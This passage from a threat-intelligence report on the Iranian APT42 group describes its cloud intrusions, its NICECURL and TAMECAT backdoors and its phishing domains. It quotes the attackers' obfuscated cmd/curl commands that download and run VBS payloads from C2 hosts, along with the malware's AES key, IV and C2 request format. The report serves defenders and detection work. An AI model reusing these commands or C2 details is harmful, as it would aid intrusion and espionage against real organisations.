</div>
</div>
</div>
</li>
</ul>
</li>
</ul>
</li>
</ul></div>
<div class="block-paragraph_advanced"><ul>
<li>
<ul>
<li>
<ul>
<li role="presentation"><span>The attacker used PowerShell cmdlets including "set-ExecutionPolicy," "Import-Module," and "Invoke-HuntSMBShares," a cmdlet from the open-source tooling module </span><a href="https://github.com/NetSPI/PowerHuntShares" rel="noopener" target="_blank"><span>PowerHuntShares</span></a><span> that can identify users with excessive network share permissions.</span></li>
</ul>
</li>
<li><strong>Searching for specific files and data of interest to Iran</strong><span>. For example, in one of the intrusions, APT42 searched for specific Iran-related documents with details about foreign affairs issues, as was observed on collected data from the Windows Registry Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths. In another intrusion, Mandiant observed APT42 browsing for files related to the Middle East as well as the Ukraine war.</span></li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig17.max-1000x1000.png" alt="APT42 Cloud Operations Flow of Attack">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="d5d0h">Figure 17: APT42 cloud operations flow of attack</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>APT42 deployed multiple defense evasion techniques</strong><span> to minimize their intrusion footprint:</span></p>
<ul>
<li role="presentation"><strong>Relying on built-in features of the Microsoft 365 environment and publicly available tools</strong><span>. This serves as double functionality to harden attribution based on tooling and to blend in the environment, while it shows an increase in adaptability.</span></li>
<li role="presentation"><strong>Clearing Google Chrome browser history</strong><span> after reviewing documents of interest.</span></li>
<li role="presentation"><span>Attempting (and possibly succeeding) to </span><strong>exfiltrate files to a OneDrive account masquerading as the victim’s organization</strong><span>, using the fake email address &lt;victim_org_name&gt;@outlook[.]com. APT42 also browsed and downloaded files from the victim’s OneDrive to disk, likely to access files of interest. </span></li>
<li role="presentation"><strong>Using anonymized infrastructure</strong><span> to interact with the victim’s environment, including ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers. </span></li>
</ul>
<p><span>Despite the previously listed defense evasion techniques, Mandiant was able to attribute the cloud operations to APT42 based on the usage of domains overlapping with APT42 credential harvesting operations and the very specific Iran-related nature of intelligence collected by the actor. </span></p>
<h2><span>APT42 Malware-Based Operations</span></h2>
<p><span>Mandiant tracks several APT42 campaigns using custom malware. Most recently, Mandiant observed APT42 deploy two custom backdoors, TAMECAT and NICECURL. Both of these backdoors were delivered with decoy content (likely via spear phishing) and provide APT42 operators with initial access to the targets. The backdoors provide a flexible code-execution interface that may be used as a jumping point to deploy additional malware or to manually execute commands on the device.</span></p>
<p><span>Mandiant estimates APT42 used these backdoors to target NGOs, </span><span>government, or intergovernmental organizations around the world,</span><span> handling issues related to Iran and the Middle East, consistent with APT42 targeting profile.<br><br></span></p>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Malware Family</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>NICECURL</span></p>
</td>
<td>
<p><span>A backdoor written in VBScript that can download additional modules to be executed, including data mining and arbitrary command execution</span></p>
</td>
</tr>
<tr>
<td>
<p><span>TAMECAT</span></p>
</td>
<td>
<p><span>A PowerShell toehold that can execute arbitrary PowerShell or C# content</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 1: APT42 Malware Families</span></p>
<h3><span>NICECURL</span></h3>
<p><span>NICECURL is a backdoor written in VBScript that can download additional modules to be executed, including a datamining module, and it provides an arbitrary command execution interface. The backdoor’s accepted commands include "kill" to remove artifacts and end execution, "SetNewConfig" to set a new sleep value, and "Module" to download and execute additional files, potentially extending NICECURL's functionality. NICECURL communicates over HTTPS.</span></p>
<p><span>In January 2024, Mandiant observed a malicious LNK file downloading NICECURL and a PDF decoy that masqueraded as an Interview Feedback Form of the Harvard T.H. Chan School of Public Health (Figure 18). The decoy mentions an interviewee by the name of Daniel Serwer, possibly referring to the scholar and foreign policy researcher by the same name, affiliated with the Middle East Institute. It is noteworthy that Mandiant has no indication these entities were targeted or compromised, but merely spoofed by APT42 decoys.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig18.max-1000x1000.png" alt="PDF decoy">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="rhwpq">Figure 18: PDF decoy</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The LNK file onedrive-form.pdf.lnk (MD5: d5a05212f5931d50bb024567a2873642) is downloaded from hxxps://drive-file-share[.]site/OneDrive-Form.pdf.lnk. This file was uploaded to the C2 on January 14, 2024.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig19.max-1000x1000.png" alt="NICECURL LNK file hosted on drive-file-share[.]site">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="rhwpq">Figure 19: NICECURL LNK file hosted on drive-file-share[.]site</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The LNK file contains the following command to download and execute the NICECURL from prism-west-candy[.]glitch[.]me (the original command is defanged):</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=CgYEFk
&amp;Prog=2_Mal_vbs.txt&amp;WH=Form.pdf\" -X PO7ST hxxps://
prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs 
&amp; call %c:7=% &amp; set b=sta7rt \"\" \"%temp%\\down.v7bs\" &amp; call %b:7=%</code></pre></div>
<div class="block-paragraph_advanced"><p><span>In February 2024, Mandiant identified another NICECURL sample named kuzen.vbs (MD5: 347b273df245f5e1fcbef32f5b836f1d), which </span><span>connects to worried-eastern-salto[.]glitch[.]me and downloads a decoy file, question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757), about Empowering Women for Peace from an American think tank specializing in U.S. foreign policy and international relations (Figure 20).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig20.max-1000x1000.png" alt="Decoy file question-Em.pdf">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="rhwpq">Figure 20: Decoy file question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>According to the contents of the decoy file, the attack possibly happened in January or the beginning of February 2024 and targeted a victim located in Australia.</span></p>
<p><span>Mandiant also observed a similarly named encrypted RAR file named “question_Empowering Women for Peace Gender Equality in Conflict Prevention and Resolution (6).rar” (MD5: 13aa118181ac6a202f0a64c0c7a61ce7). This RAR file shares the same name with the decoy PDF and likely targeted the same victim. </span></p>
<p><span>This infection chain was previously documented by </span><a href="https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/" rel="noopener" target="_blank"><span>Volexity</span></a><span>.</span></p>
<h3><span>TAMECAT </span></h3>
<p><span>In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold that can execute arbitrary PowerShell or C# content. TAMECAT is dropped by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world.</span></p>
<h4><span>TAMECAT Execution</span></h4>
<p><span>Execution begins with a small VBScript downloader that leverages Windows Management Instrumentation (WMI) to query anti-virus products running on the victim's system. Depending on the script determining if Windows Defender is running, differing download commands and URLs are used.</span></p>
<p><span>If Windows Defender is running, the script will leverage conhost to execute a PowerShell command that uses Wget to download content at the following URL: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt.</span></p>
<p><span>For all other cases, the script uses Cmd.exe to execute a Curl command that is similar to Curl commands used in the NICECURL execution chain previously described:<br><br></span></p>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><span>cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d ""i1=aaaa&amp;EF1=2m.txt&amp;WF1=test.pdf"" -X PO9ST hxxp://tnt200[.]mywire[.]org/Do1 -o %temp%\2m.v9bs &amp; call %c:9=% &amp; set b=sta9rt """" ""%temp%\2m.v9bs"" &amp; call %b:9=%</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><ul>
<li role="presentation"><span>a2.vbs (MD5: d7bf138d1aa2b70d6204a2f3c3bc72a7)</span>
<ul>
<li role="presentation"><span>Downloads: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8)</span>
<ul>
<li role="presentation"><span>TAMECAT loader</span></li>
</ul>
</li>
<li role="presentation"><span>Downloads: hxxp://tnt200[.]mywire[.]org/Do1</span>
<ul>
<li role="presentation"><span>Content not available</span></li>
<li role="presentation"><span>Possibly downloads malware from NICECURL ecosystem</span></li>
</ul>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig21.max-1000x1000.png" alt="a2.vbs content">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q3idg">Figure 21: a2.vbs content</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The downloaded script, nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8), is a PowerShell script that contains an obfuscated and AES-encrypted TAMECAT backdoor. The script also downloads an additional PowerShell that is used to AES decrypt the embedded TAMECAT backdoor.</span></p>
<p><span>When downloading the AES decryption script, the following hard-coded User-agent string is used:</span></p>
<ul>
<li role="presentation"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36</span></li>
</ul>
<p><span>It is noteworthy that the script contains a unique TAMECAT key value T2r0y1M1e1n1o0w1 that was used in a previously reported TAMECAT sample observed in June 2023 (MD5: dd2653a2543fa44eaeeff3ca82fe3513), further indicating the two samples belong to the same malware family. However, the unique value is not used in the script.</span></p>
<p><span>The script stores the URL for the AES decryption script as a Base64 string where the first three characters are truncated and the remaining string is Base64 decoded: </span></p>
<ul>
<li role="presentation"><strong>pep</strong><span>aHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0</span>
<ul>
<li role="presentation">Decodes to: hxxps://s3[.]tebi[.]io/icestorage/df32s.txt</li>
</ul>
</li>
<li role="presentation"><span>The script stored at this URL is df32s.txt (MD5: c3b9191f3a3c139ae886c0840709865e)</span></li>
</ul>
<p><span>The response content is Base64 decoded and also further decoded using a routine that does the following:</span></p>
<ul>
<li role="presentation"><span>Inverts the bits of each byte within an array named $bytesOfRes</span></li>
<li role="presentation"><span>Extracts the least significant byte (8 bits) from the inverted representation</span></li>
<li role="presentation"><span>Converts the extracted byte back into a numerical byte value</span></li>
</ul>
<p><span>Once decoded, the resulting PowerShell function resembles the following:</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig22.max-1000x1000.png" alt="Decoded df32s.txt">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="kh7ts">Figure 22: Decoded df32s.txt</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The decoded script is a function that is mainly used to AES decrypt parameters that are passed to it. In addition, it defines global variables including a C2 domain, which are used by the TAMECAT backdoor that gets decrypted and executed.</span></p>
<p><span>The following AES key and IV are used to decrypt content:</span></p>
<ul>
<li role="presentation"><span>AES Key: kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B</span></li>
<li role="presentation"><span>AES IV: 0T9r1y1M2e0N0o1w</span></li>
</ul>
<p><span>The parent script uses the AES decrypt function to decode Base64, and AES decrypts the following string that is contained in the parent script:<br><br></span></p>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><span>v+UDXK47mBGgYqTbOXjXVD6MzhZenTfVf6CKxQFp2+AiPHMvmA2a4IiBz4rOi8ffxWdXFtrPk6<br>UABw1b6oBPsW1VV/HNU0mf8jH7xsoBAHY5Sp6vdYc7WGZ6SYO72KIH/hOyBlS5wc7Y86wJ<br>R9naW+0nINCYZV6RyD5t/fDpqEoRYW6dHwoebLECkEck/N5C1jhlFHaoS51QKSfgraHI5iRiT6p<br>fpqUNeJHbYz3VYuo/j2FZ6f5BCJgXoHKPmf4pUSwSZH0qQSa98blmdAH+tG7jc3AUE76IHx4x<br>kzxAldO/4b97duoI6rm+Ucy3rRHHrVnPQ0TvvTvudD/LDBwn3DkNcKSTDvEQDwIgni/MU7BOw<br>klcE1+qQjabXTGr+CrL0c53dNA4OGNYkBAnLokjcoNxKmxbCSK3oSdFEz2+htgPMOjq14IGoPS<br>OWcPX2CVK</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p><span>Once decrypted, additional PowerShell is revealed that appends together a string obfuscated within nconf.txt, and AES decrypts the string. The decrypted results are the TAMECAT backdoor.<br><br></span></p>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><span>Borjol($wvp[5]+$xme[2]+$nwk[3]+$vrl[3]+$gzk[4]+$ni2[0]+$tkk[2]+$kq4[0]+$yoe[4]+$jwv[0]+<br></span><span>$ywa[0]+$sxi[5]+$bw9[12]+$kgu[1]+$mdi[0]+$ruz[3]+$byh[3]+$sja[3]+$wqf[0]+$wof[2]+$mg<br>4[1]+$rfi[5]+$dt9[11]+$qgv[9]+$jt5[0]+$lli[1]+$owd[4]+$lp2[6]+$wkb[2]+$zen[7]+$sro[0]+$ta8<br>[0]+$kg9[0]+$esk[8]+$ci4[5]+$oyx[0]+$ico[1]+$xy9[1]+$vvl[0])</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p><span>The TAMECAT backdoor initially writes a likely victim identifier to the following location: %LOCALAPPDATA%\config.txt.</span></p>
<p><span>The TAMECAT backdoor makes an initial POST request to the globally defined C2 domain: hxxps://accurate-sprout-porpoise[.]glitch[.]me. </span></p>
<p><span>The initial POST request contains information like the following, which are AES encrypted and Base64 encoded:<br><br></span></p>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><span>{<br></span><span>    "rwsdjfxsdf": [<br></span><span>        {<br></span><span>            "num": "1"<br></span><span>        },<br></span><span>        {<br></span><span>            "OS": "&lt;os_caption&gt;"<br></span><span>        },<br></span><span>        {<br></span><span>            "ComputerName": "&lt;computer_name&gt;"<br></span><span>        },<br></span><span>        {<br></span><span>            "Token": "&lt;value_from_configtxt&gt;"<br></span><span>        }<br></span><span>    ]<br></span><span>}</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p><span>The TAMECAT backdoor AES encrypts the content using the key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B and a randomly generated 16-character IV, generated from the string ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. The randomly generated IV is added to the POST request in a header called Content-DPR. The AES key is not transmitted to the C2, so it is likely the same AES key is used for multiple victims. </span></p>
<p><span>If the response is successful, it is also expected to contain a header named Content-DPR, which is expected to house an IV used with the aforementioned AES key to decrypt the response data.</span></p>
<p><span>The decrypted response data is split by the paragraph symbol (¶) into four values:</span></p>
<ul>
<li role="presentation"><span>Language</span></li>
<li role="presentation"><span>Command</span></li>
<li role="presentation"><span>ThreadName</span></li>
<li role="presentation"><span>StartStop</span></li>
</ul>
<p><span>The available commands appear mostly the same as previously identified TAMECAT samples:<br><br></span></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Variable</strong></p>
</td>
<td>
<p><strong>Value</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>$language</span></p>
</td>
<td>
<p><span>powershell or csharp </span></p>
</td>
<td>
<p><span>Interpret command value as PowerShell or CSharp code</span></p>
</td>
</tr>
<tr>
<td>
<p><span>$StartStop</span></p>
</td>
<td>
<p><span>downloadutils or start or stop</span></p>
</td>
<td>
<p><span>Download additional content, start command with parameters, stop command</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 2: Available commands</span></p>
<h2><span>Outlook and Implications</span></h2>
<p><span>APT42 has remained relatively focused on intelligence collection and targeting similar victimology, despite the Israel-Hamas war that has led other Iran-nexus actors to adapt by conducting disruptive, destructive, and hack-and-leak activities. </span></p>
<p><span>In addition to deploying custom implants on compromised devices, APT42 was also observed conducting extensive cloud operations. In cloud environments not vulnerable to implants, APT42 relies on social engineering to harvest credentials and collect intelligence of strategic interest to Iran. </span><span>Credential abuse was also emphasized as a common initial access vector to cloud environments in the latest <a href="https://services.google.com/fh/files/misc/threat_horizons_report_h12024.pdf" rel="noopener" target="_blank">Google Cloud Threat Horizons </a></span><a href="https://services.google.com/fh/files/misc/threat_horizons_report_h12024.pdf" rel="noopener" target="_blank"><span>report</span></a><span>.</span></p>
<p><span>The methods deployed by APT42 leave a minimal footprint and might make the detection and mitigation of their activities more challenging for network defenders. The TTPs, IOCs, and provided rules included in this blog post may support detection and mitigation efforts.</span></p>
<p><span>For Google Chronicle Enterpri</span><span>se+ customers, Chronicle rules hav</span><span>e been released to your </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span>Emerging Threats</span></a><span> rule pack, and IOCs listed in this blog post are available for prioritization with </span><a href="https://cloud.google.com/chronicle/docs/detection"><span>Applied Threat Intelligence</span></a><span>. In addition, the IOCs listed in this blog post are blocked in </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span>Safe Browsing</span></a><span>, protecting Google Chrome users, as well as other browsers.</span></p></div>
<div class="block-paragraph_advanced"><h2><span>Indicators of Compromise (IOCs)</span></h2>
<p>A <a href="https://www.virustotal.com/gui/collection/ebb39ba4f340314ef4f69394f0793fc1e995ee22a3786b3d3c5fc67a05552fd7/summary" rel="noopener" target="_blank">VirusTotal Collection featuring IOCs related to the APT42 activity</a> described in this post is now available for registered users.</p>
<h3><span>Credential Harvesting and Cloud-Based Operations</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Domain</strong></p>
</td>
<td>
<p><strong>Organization</strong><span> </span></p>
</td>
<td>
<p><strong>Country</strong><span> </span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Cluster A</strong></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>News Outlets</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>azadlliq[.]info </span></p>
</td>
<td>
<p><span>Azadliq </span></p>
</td>
<td>
<p><span>Azerbaijan </span></p>
</td>
</tr>
<tr>
<td>
<p><span>businesslnsider[.]org </span></p>
</td>
<td>
<p><span>Business Insider </span></p>
</td>
<td>
<p><span>U.S. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>ecomonist[.]org</span></p>
</td>
<td>
<p><span>The Economist</span></p>
</td>
<td>
<p><span>UK</span></p>
</td>
</tr>
<tr>
<td>
<p><span>eocnomist[.]com</span></p>
</td>
<td>
<p><span>The Economist</span></p>
</td>
<td>
<p><span>UK</span></p>
</td>
</tr>
<tr>
<td>
<p><span>foreiqnaffairs[.]com </span></p>
</td>
<td>
<p><span>Foreign Affairs </span></p>
</td>
<td>
<p><span>U.S. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>forieqnaffairs[.]com</span></p>
</td>
<td>
<p><span>Foreign Affairs </span></p>
</td>
<td>
<p><span>U.S. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>foreiqnaffairs[.]org</span></p>
</td>
<td>
<p><span>Foreign Affairs </span></p>
</td>
<td>
<p><span>U.S. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>israelhayum[.]com</span></p>
</td>
<td>
<p><span>Israel Hayom</span></p>
</td>
<td>
<p><span>Israel</span></p>
</td>
</tr>
<tr>
<td>
<p><span>jpost[.]press </span></p>
</td>
<td>
<p><span>Jerusalem Post </span></p>
</td>
<td>
<p><span>Israel </span></p>
</td>
</tr>
<tr>
<td>
<p><span>jpostpress[.]com </span></p>
</td>
<td>
<p><span>Jerusalem Post </span></p>
</td>
<td>
<p><span>Israel </span></p>
</td>
</tr>
<tr>
<td>
<p><span>khaleejtimes[.]org </span></p>
</td>
<td>
<p><span>Khaleej Times</span></p>
</td>
<td>
<p><span>UAE </span></p>
</td>
</tr>
<tr>
<td>
<p><span>khalejtimes[.]org </span></p>
</td>
<td>
<p><span>Khaleej Times</span></p>
</td>
<td>
<p><span>UAE </span></p>
</td>
</tr>
<tr>
<td>
<p><span>maariv[.]net </span></p>
</td>
<td>
<p><span>Maariv </span></p>
</td>
<td>
<p><span>Israel </span></p>
</td>
</tr>
<tr>
<td>
<p><span>themedealine[.]org </span></p>
</td>
<td>
<p><span>The Media Line </span></p>
</td>
<td>
<p><span>U.S. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>timesfisrael[.]com</span></p>
</td>
<td>
<p><span>Times Of Israel</span></p>
</td>
<td>
<p><span>Israel</span></p>
</td>
</tr>
<tr>
<td>
<p><span>vanityfaire[.]org</span></p>
</td>
<td>
<p><span>Vanity Fair</span></p>
</td>
<td>
<p><span>U.S.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>washinqtonpost[.]press </span></p>
</td>
<td>
<p><span>The Washington Post </span></p>
</td>
<td>
<p><span>U.S. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>ynetnews[.]press </span></p>
</td>
<td>
<p><span>Ynet </span></p>
</td>
<td>
<p><span>Israel </span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Legitimate Services</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>account-signin[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>acconut-signin[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>accounts-mails[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>coordinate[.]icu</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>dloffice[.]top</span></p>
</td>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>dloffice[.]buzz</span></p>
</td>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>myaccount-signin[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>signin-acconut[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>signin-accounts[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>signin-mail[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>signin-mails[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>signin-myaccounts[.]com</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>support-account[.]xyz</span></p>
</td>
<td>
<p><span>Google/Microsoft</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Cluster B</strong></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Generic Login Services</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>accredit-validity[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>activity-permission[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>admin-stable-right[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>admiscion[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>admit-roar-frame[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>advission[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>affect-fist-ton[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>avid-striking-eagerness[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>beaviews[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>besvision[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>bloom-flatter-affably[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>book-download[.]shop</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
